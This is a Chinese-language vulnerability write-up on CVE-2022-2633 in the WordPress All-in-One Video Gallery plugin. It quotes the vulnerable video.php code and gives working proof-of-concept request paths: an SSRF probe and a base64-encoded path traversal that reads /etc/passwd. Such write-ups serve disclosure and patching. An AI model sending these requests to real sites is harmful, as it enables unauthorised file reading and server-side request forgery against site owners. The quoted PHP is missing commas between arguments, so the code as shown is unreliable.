WordPress All-in-One Video Gallery 任意文件读取漏洞 CVE-2022-2633
2022-10-10 19:33:31 Author: PeiQi文库(查看原文) 阅读量:56 收藏

漏洞描述

WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞,攻击者通过发送特定的请求包读取任意文件

漏洞影响

WordPress All-in-One Video Gallery  <= 2.6.0

插件名

All-in-One Video Gallery
https://downloads.wordpress.org/plugin/all-in-one-video-gallery.2.6.0.zip

漏洞复现

对比漏洞修复的文件找到出现漏洞的文件

wp-content/plugins/all-in-one-video-gallery/public/video.php

这里接收 dl 参数,dl 参数不为 数字类型时,参数将 base64 解码传入


  if ( is_numeric( $_GET['dl'] ) ) {
   $file = get_post_meta( (int) $_GET['dl'], 'mp4'true );
  } else {
   $file = base64_decode( $_GET['dl'] );
  }

  if ( empty( $file ) ) {
   die( esc_html__( 'Download file URL is empty.''all-in-one-video-gallery' ) );
            exit;
        }

当传入的参数中不存在 http:// 或 https:// 时,参数 $formatted_path 的值改变

当 $formatted_path 为 url 时存在 SSRF漏洞,传入 base64编码 的目标URL就可以得到回显

/index.php/video/?dl=aHR0cHM6Ly93d3cuYmFpZHUuY29t

看向代码最后的片段,则存在任意文件读取漏洞

/index.php/video/?dl=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

关注公众号

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群找WgpsecBot机器人拉你啦~

支持作者

关于文库

在线文库: http://wiki.peiqi.tech
Github: https://github.com/PeiQi0/PeiQi-WIKI-Book 

文库动态


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247493613&idx=1&sn=589006eac3082d74820d6bd6e575cf60&chksm=cecc4fb4f9bbc6a28750595e1610be768f98f56d6aa8614e96125d300aa0e9f6267ac587c950#rd
如有侵权请联系:admin#unsafe.sh